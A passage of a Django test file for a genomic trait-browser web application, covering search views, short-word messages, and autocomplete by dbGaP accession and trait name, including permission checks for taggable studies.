def test_message_for_short_words_in_both_trait_and_dataset_descriptions(self):
response = self.client.get(self.get_url(), {'description': 'lo ipsum', 'dataset_description': 'lorem ip'})
context = response.context
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 3)
self.assertEqual('Ignored short words in "Variable description" field: lo', str(messages[0]))
self.assertEqual('Ignored short words in "Dataset description" field: ip', str(messages[1]))
def test_can_find_apostrophes_in_description_field(self):
"""Can search for apostrophes."""
trait = factories.SourceTraitFactory.create(i_description="don't miss me")
response = self.client.get(self.get_url(), {'description': "don't"})
context = response.context
self.assertIn(trait, context['results_table'].data)
def test_can_find_underscores_in_description_field(self):
"""Can search for undescores."""
trait = factories.SourceTraitFactory.create(i_description='description with_char')
response = self.client.get(self.get_url(), {'description': 'with_char'})
context = response.context
self.assertIn(trait, context['results_table'].data)
class StudySourceTraitSearchTest(ClearSearchIndexMixin, UserLoginTestCase):
def setUp(self):
super(StudySourceTraitSearchTest, self).setUp()
self.study = factories.StudyFactory.create()
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:traits:search', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.study.pk))
self.assertEqual(response.status_code, 200)
def test_view_with_invalid_pk(self):
"""View returns 404 response code when the pk doesn't exist."""
response = self.client.get(self.get_url(self.study.pk + 1))
self.assertEqual(response.status_code, 404)
def test_context_data_with_empty_form(self):
"""View has the correct context upon initial load."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIsInstance(context['form'], forms.SourceTraitSearchForm)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_blank_form(self):
"""View has the correct context upon invalid form submission."""
response = self.client.get(self.get_url(self.study.pk), {'description': ''})
context = response.context
self.assertTrue(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_valid_search_and_no_results(self):
"""View has correct context with a valid search but no results."""
response = self.client.get(self.get_url(self.study.pk), {'description': 'test'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
def test_context_data_with_valid_search_and_some_results(self):
"""View has correct context with a valid search and existing results."""
factories.SourceTraitFactory.create(
i_description='lorem ipsum',
source_dataset__source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem'})
qs = searches.search_source_traits(description='lorem')
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertQuerysetEqual(qs, [repr(x) for x in context['results_table'].data])
def test_context_data_only_finds_results_in_requested_study(self):
"""View has correct context with a valid search and existing results if a study is selected."""
trait = factories.SourceTraitFactory.create(
i_description='lorem ipsum',
source_dataset__source_study_version__study=self.study)
factories.SourceTraitFactory.create(i_description='lorem ipsum')
get = {'description': 'lorem'}
response = self.client.get(self.get_url(self.study.pk), get)
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(trait)])
def test_context_data_with_valid_search_and_trait_name(self):
"""View has correct context with a valid search and existing results if a study is selected."""
trait = factories.SourceTraitFactory.create(
i_description='lorem ipsum',
i_trait_name='dolor',
source_dataset__source_study_version__study=self.study)
factories.SourceTraitFactory.create(
i_description='lorem other',
i_trait_name='tempor',
source_dataset__source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem', 'name': 'dolor'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(trait)])
def test_context_data_no_messages_for_initial_load(self):
"""No messages are displayed on initial load of page."""
response = self.client.get(self.get_url(self.study.pk))
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_no_messages_for_invalid_form(self):
"""No messages are displayed if form is invalid."""
response = self.client.get(self.get_url(self.study.pk), {'description': ''})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_info_message_for_no_results(self):
"""A message is displayed if no results are found."""
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '0 results found.')
def test_context_data_info_message_for_one_result(self):
"""A message is displayed if one result is found."""
factories.SourceTraitFactory.create(
i_description='lorem ipsum',
source_dataset__source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '1 result found.')
def test_context_data_info_message_for_multiple_result(self):
"""A message is displayed if two results are found."""
factories.SourceTraitFactory.create(
i_description='lorem ipsum',
source_dataset__source_study_version__study=self.study)
factories.SourceTraitFactory.create(
i_description='lorem ipsum 2',
source_dataset__source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '2 results found.')
def test_reset_button_works_on_initial_page(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(self.study.pk), {'reset': 'Reset'}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_reset_button_works_with_data_in_form(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(self.study.pk), {'reset': 'Reset', 'name': ''}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_context_data_with_valid_search_trait_description_and_dataset(self):
"""View has correct context with a valid search and existing results if a study is selected."""
dataset = factories.SourceDatasetFactory.create(source_study_version__study=self.study)
other_dataset = factories.SourceDatasetFactory.create(source_study_version__study=self.study)
trait = factories.SourceTraitFactory.create(
i_description='lorem ipsum',
i_trait_name='dolor',
source_dataset=dataset
)
factories.SourceTraitFactory.create(
i_description='lorem other',
i_trait_name='tempor',
source_dataset=other_dataset
)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem', 'datasets': [dataset.pk]})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(trait)])
def test_context_data_with_dataset_from_a_different_study(self):
"""View has correct context with a valid search and existing results if a study is selected."""
other_study = factories.StudyFactory.create()
dataset = factories.SourceDatasetFactory.create(source_study_version__study=other_study)
trait = factories.SourceTraitFactory.create(
i_description='lorem ipsum',
i_trait_name='dolor',
source_dataset=dataset
)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem', 'datasets': [dataset.pk]})
self.assertFormError(response, "form", 'datasets', forms.SourceTraitSearchOneStudyForm.ERROR_DIFFERENT_STUDY)
def test_context_data_with_deprecated_dataset(self):
"""View has correct context with a valid search and existing results if a study is selected."""
study_version = factories.SourceStudyVersionFactory(i_is_deprecated=True, study=self.study)
dataset = factories.SourceDatasetFactory.create(source_study_version=study_version)
trait = factories.SourceTraitFactory.create(
i_description='lorem ipsum',
i_trait_name='dolor',
source_dataset=dataset
)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem', 'datasets': [dataset.pk]})
self.assertFormError(response, "form", 'datasets',
forms.SourceTraitSearchOneStudyForm.ERROR_DEPRECATED_DATASET)
def test_short_words_are_removed(self):
"""Short words are properly removed."""
trait_1 = factories.SourceTraitFactory.create(
i_description='lorem ipsum',
source_dataset__source_study_version__study=self.study
)
trait_2 = factories.SourceTraitFactory.create(
i_description='lorem ipsum',
source_dataset__source_study_version__study=self.study
)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem ip'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertEqual(len(context['results_table'].rows), 2)
self.assertIn(trait_1, context['results_table'].data)
self.assertIn(trait_2, context['results_table'].data)
def test_message_for_ignored_short_words(self):
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem ip'})
context = response.context
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 2)
self.assertIn('Ignored short words in "Variable description" field', str(messages[0]))
def test_can_find_apostrophes_in_description_field(self):
"""Can search for apostrophes."""
trait = factories.SourceTraitFactory.create(
i_description="don't miss me",
source_dataset__source_study_version__study=self.study
)
response = self.client.get(self.get_url(self.study.pk), {'description': "don't"})
context = response.context
self.assertIn(trait, context['results_table'].data)
def test_can_find_underscores_in_description_field(self):
"""Can search for undescores."""
trait = factories.SourceTraitFactory.create(
i_description='description with_char',
source_dataset__source_study_version__study=self.study
)
response = self.client.get(self.get_url(self.study.pk), {'description': 'with_char'})
context = response.context
self.assertIn(trait, context['results_table'].data)
TEST_PHVS = (5, 50, 500, 50000000, 55, 555, 55555555, 52, 520, 5200, )
TEST_PHV_QUERIES = {'5': (5, 50, 500, 50000000, 55, 555, 55555555, 52, 520, 5200, ),
'05': (),
'000005': (500, 555, 520, ),
'00000005': (5, ),
'52': (52, 520, 5200, ),
'052': (),
'000052': (5200, ),
'0000052': (520, ),
'55555555': (55555555, ),
'0': (5, 50, 500, 55, 555, 52, 520, 5200, ),
}
class SourceTraitPHVAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(SourceTraitPHVAutocompleteTest, self).setUp()
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for phv in TEST_PHVS:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset__i_id=6, source_dataset__source_study_version__i_version=2,
source_dataset__source_study_version__i_is_deprecated=False,
i_dbgap_variable_accession=phv)
)
def get_url(self, *args):
return reverse('trait_browser:source:traits:autocomplete:by-phv')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.source_traits]), sorted(pks))
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of a trait."""
# Create an older, deprecated version of an existing source trait.
trait = self.source_traits[0]
# Make a new copy of the source study version, and decrement the version number.
ssv2 = copy(trait.source_dataset.source_study_version)
ssv2.i_version -= 1
ssv2.i_id += 1
ssv2.i_is_deprecated = True
ssv2.save()
# Make a new copy of the dataset, linked to older ssv.
ds2 = copy(trait.source_dataset)
ds2.i_id += 1
ds2.source_study_version = ssv2
ds2.save()
# Copy the source trait and link it to the older dataset.
trait2 = copy(trait)
trait2.source_dataset = ds2
trait2.i_trait_id += 1
trait2.save()
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url, {'q': trait2.i_dbgap_variable_accession})
pks = get_autocomplete_view_ids(response)
self.assertIn(self.source_traits[0].pk, pks)
self.assertNotIn(trait2.pk, pks)
def test_phv_test_queries_without_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is not in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
def test_phv_test_queries_with_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': 'phv' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
class PhenotypeTaggerTaggableStudyFilteredSourceTraitPHVAutocompleteTest(PhenotypeTaggerLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(PhenotypeTaggerTaggableStudyFilteredSourceTraitPHVAutocompleteTest, self).setUp()
self.source_study_version = factories.SourceStudyVersionFactory.create(study=self.study)
self.source_dataset = factories.SourceDatasetFactory.create(source_study_version=self.source_study_version)
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for phv in TEST_PHVS:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset=self.source_dataset, i_dbgap_variable_accession=phv))
self.user.refresh_from_db()
def get_url(self, *args):
return reverse('trait_browser:source:traits:autocomplete:taggable:by-phv')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.source_traits]), sorted(pks))
def test_returns_all_traits_with_two_taggable_studies(self):
"""Queryset returns all of the traits from two different studies."""
# Delete all but five source traits, so that there are 5 from each study.
models.SourceTrait.objects.exclude(i_dbgap_variable_accession__in=TEST_PHVS[:5]).delete()
self.source_traits = list(models.SourceTrait.objects.all())
study2 = factories.StudyFactory.create()
self.user.profile.taggable_studies.add(study2)
source_traits2 = factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version__study=study2)
# Get results from the autocomplete view and make sure only the correct study is found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that there's only one page of results.
self.assertTrue(models.SourceTrait.objects.all().count() <= 10)
self.assertEqual(len(returned_pks), len(self.source_traits + source_traits2))
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertIn(trait.i_trait_id, returned_pks)
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of a trait."""
# Copy the source study version and increment it.
source_study_version2 = copy(self.source_study_version)
source_study_version2.i_version += 1
source_study_version2.i_id += 1
source_study_version2.save()
# Make the old ssv deprecated.
self.source_study_version.i_is_deprecated = True
self.source_study_version.save()
# Copy the source dataset and increment it. Link it to the new ssv.
source_dataset2 = copy(self.source_dataset)
source_dataset2.i_id += 1
source_dataset2.source_study_version = source_study_version2
source_dataset2.save()
# Copy the source traits and link them to the new source dataset.
source_traits2 = []
for trait in self.source_traits:
st2 = copy(trait)
st2.source_dataset = source_dataset2
st2.i_trait_id = trait.i_trait_id + len(self.source_traits)
st2.save()
source_traits2.append(st2)
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), len(source_traits2))
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertNotIn(trait.i_trait_id, returned_pks)
def test_other_study_not_in_queryset(self):
"""Queryset returns only traits from the user's taggable studies."""
# Delete all but five source traits, so that there are 5 from each study.
models.SourceTrait.objects.exclude(i_dbgap_variable_accession__in=TEST_PHVS[:5]).delete()
self.source_traits = list(models.SourceTrait.objects.all())
study2 = factories.StudyFactory.create()
source_traits2 = factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version__study=study2)
# Get results from the autocomplete view and make sure only the correct study is found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that there's only one page of results.
self.assertTrue(models.SourceTrait.objects.all().count() <= 10)
self.assertEqual(len(returned_pks), len(self.source_traits))
for trait in source_traits2:
self.assertNotIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertIn(trait.i_trait_id, returned_pks)
def test_forbidden_empty_taggable_studies(self):
"""View returns 403 code when the user has no taggable_studies."""
self.user.profile.taggable_studies.remove(self.study)
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 403)
def test_phv_test_queries_without_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is not in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
def test_phv_test_queries_with_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': 'phv' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
class DCCAnalystTaggableStudyFilteredSourceTraitPHVAutocompleteTest(DCCAnalystLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(DCCAnalystTaggableStudyFilteredSourceTraitPHVAutocompleteTest, self).setUp()
self.study = factories.StudyFactory.create()
self.source_study_version = factories.SourceStudyVersionFactory.create(study=self.study)
self.source_dataset = factories.SourceDatasetFactory.create(source_study_version=self.source_study_version)
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for phv in TEST_PHVS:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset=self.source_dataset, i_dbgap_variable_accession=phv))
self.user.refresh_from_db()
def get_url(self, *args):
return reverse('trait_browser:source:traits:autocomplete:taggable:by-phv')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.source_traits]), sorted(pks))
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of a trait."""
# Copy the source study version and increment it.
source_study_version2 = copy(self.source_study_version)
source_study_version2.i_version += 1
source_study_version2.i_id += 1
source_study_version2.save()
# Make the old ssv deprecated.
self.source_study_version.i_is_deprecated = True
self.source_study_version.save()
# Copy the source dataset and increment it. Link it to the new ssv.
source_dataset2 = copy(self.source_dataset)
source_dataset2.i_id += 1
source_dataset2.source_study_version = source_study_version2
source_dataset2.save()
# Copy the source traits and link them to the new source dataset.
source_traits2 = []
for trait in self.source_traits:
st2 = copy(trait)
st2.source_dataset = source_dataset2
st2.i_trait_id = trait.i_trait_id + len(self.source_traits)
st2.save()
source_traits2.append(st2)
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), len(source_traits2))
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertNotIn(trait.i_trait_id, returned_pks)
def test_other_study_not_in_queryset(self):
"""Queryset returns traits from all studies."""
# Delete all but five source traits, so that there are 5 from each study.
models.SourceTrait.objects.exclude(i_dbgap_variable_accession__in=TEST_PHVS[:5]).delete()
self.source_traits = list(models.SourceTrait.objects.all())
study2 = factories.StudyFactory.create()
source_traits2 = factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version__study=study2)
# Get results from the autocomplete view and make sure only the correct study is found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that there's only one page of results.
self.assertTrue(models.SourceTrait.objects.all().count() <= 10)
self.assertEqual(len(returned_pks), models.SourceTrait.objects.all().count())
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertIn(trait.i_trait_id, returned_pks)
def test_with_empty_taggable_studies(self):
"""View returns 200 code when the user has no taggable_studies."""
self.user.profile.taggable_studies.remove(self.study)
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_remove_is_staff(self):
"""View returns 403 code when the user is no longer staff."""
self.user.is_staff = False
self.user.save()
self.user.refresh_from_db()
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 403)
def test_phv_test_queries_without_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is not in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
def test_phv_test_queries_with_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': 'phv' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
TEST_NAMES = ('abc', 'ABC', 'aBc', 'abc2', 'abc22', 'c225ab', 'abc_and_ABC', )
TEST_NAME_QUERIES = {'a': ('abc', 'ABC', 'aBc', 'abc2', 'abc22', 'abc_and_ABC', ),
'A': ('abc', 'ABC', 'aBc', 'abc2', 'abc22', 'abc_and_ABC', ),
'ab': ('abc', 'ABC', 'aBc', 'abc2', 'abc22', 'abc_and_ABC', ),
'aB': ('abc', 'ABC', 'aBc', 'abc2', 'abc22', 'abc_and_ABC', ),
'abc2': ('abc2', 'abc22', ),
'abc22': ('abc22', ),
'c22': ('c225ab', ),
'abc': ('abc', 'ABC', 'aBc', 'abc2', 'abc22', 'abc_and_ABC', ),
'abc_and': ('abc_and_ABC', ),
'225': (),
'very_long_string': (),
}
class SourceTraitNameAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(SourceTraitNameAutocompleteTest, self).setUp()
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for name in TEST_NAMES:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset__i_id=6, source_dataset__source_study_version__i_version=2,
source_dataset__source_study_version__i_is_deprecated=False,
i_trait_name=name)
)
def get_url(self, *args):
return reverse('trait_browser:source:traits:autocomplete:by-name')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.source_traits]), sorted(pks))
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of traits with the same trait name."""
# Create an older, deprecated version of an existing source trait.
trait = self.source_traits[0]
# Make a new copy of the source study version, and decrement the version number.
ssv2 = copy(trait.source_dataset.source_study_version)
ssv2.i_version -= 1
ssv2.i_id += 1
ssv2.i_is_deprecated = True
ssv2.save()
# Make a new copy of the dataset, linked to older ssv.
ds2 = copy(trait.source_dataset)
ds2.i_id += 1
ds2.source_study_version = ssv2
ds2.save()
# Copy the source trait and link it to the older dataset.
trait2 = copy(trait)
trait2.source_dataset = ds2
trait2.i_trait_id += 1
trait2.save()
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url, {'q': trait.i_trait_name})
pks = get_autocomplete_view_ids(response)
self.assertIn(trait.pk, pks)
self.assertNotIn(trait2.pk, pks)
def test_name_test_queries(self):
"""Returns only the correct source trait for each of the TEST_NAME_QUERIES."""
url = self.get_url()
for query in TEST_NAME_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_NAME_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_name in expected_matches:
# This filter should only have one result, but I want to make sure.
name_queryset = models.SourceTrait.objects.filter(i_trait_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected trait name {} with query '{}'".format(expected_name, query))
class PhenotypeTaggerTaggableStudyFilteredSourceTraitNameAutocompleteTest(PhenotypeTaggerLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(PhenotypeTaggerTaggableStudyFilteredSourceTraitNameAutocompleteTest, self).setUp()
self.source_study_version = factories.SourceStudyVersionFactory.create(study=self.study)
self.source_dataset = factories.SourceDatasetFactory.create(source_study_version=self.source_study_version)
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for name in TEST_NAMES:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset=self.source_dataset, i_trait_name=name))
self.user.refresh_from_db()
def get_url(self, *args):
return reverse('trait_browser:source:traits:autocomplete:taggable:by-name')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.source_traits]), sorted(pks))
def test_returns_all_traits_with_two_taggable_studies(self):
"""Queryset returns all of the traits from two different studies."""
# Delete all source traits and make 5 new ones, so there are only 5 for study 1.
models.SourceTrait.objects.all().delete()
self.source_traits = factories.SourceTraitFactory.create_batch(5, source_dataset=self.source_dataset)
study2 = factories.StudyFactory.create()
self.user.profile.taggable_studies.add(study2)
source_traits2 = factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version__study=study2)
# Get results from the autocomplete view and make sure only the correct study is found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that there's only one page of results.
self.assertTrue(models.SourceTrait.objects.all().count() <= 10)
self.assertEqual(len(returned_pks), len(self.source_traits + source_traits2))
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertIn(trait.i_trait_id, returned_pks)
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of a trait."""
# Copy the source study version and increment it.
source_study_version2 = copy(self.source_study_version)
source_study_version2.i_version += 1
source_study_version2.i_id += 1
source_study_version2.save()
# Make the old ssv deprecated.
self.source_study_version.i_is_deprecated = True
self.source_study_version.save()
# Copy the source dataset and increment it. Link it to the new ssv.
source_dataset2 = copy(self.source_dataset)
source_dataset2.i_id += 1
source_dataset2.source_study_version = source_study_version2
source_dataset2.save()
# Copy the source traits and link them to the new source dataset.
source_traits2 = []
for trait in self.source_traits:
st2 = copy(trait)
st2.source_dataset = source_dataset2
st2.i_trait_id = trait.i_trait_id + len(self.source_traits)
st2.save()
source_traits2.append(st2)
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), len(source_traits2))
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertNotIn(trait.i_trait_id, returned_pks)
def test_other_study_not_in_queryset(self):
"""Queryset returns only traits from the user's taggable studies."""
# Delete all source traits and make 5 new ones, so there are only 5 for study 1.
models.SourceTrait.objects.all().delete()
self.source_traits = factories.SourceTraitFactory.create_batch(5, source_dataset=self.source_dataset)
study2 = factories.StudyFactory.create()
source_traits2 = factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version__study=study2)
# Get results from the autocomplete view and make sure only the correct study is found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that there's only one page of results.
self.assertTrue(models.SourceTrait.objects.all().count() <= 10)
self.assertEqual(len(returned_pks), len(self.source_traits))
for trait in source_traits2:
self.assertNotIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertIn(trait.i_trait_id, returned_pks)
def test_forbidden_empty_taggable_studies(self):
"""View returns 403 code when the user has no taggable_studies."""
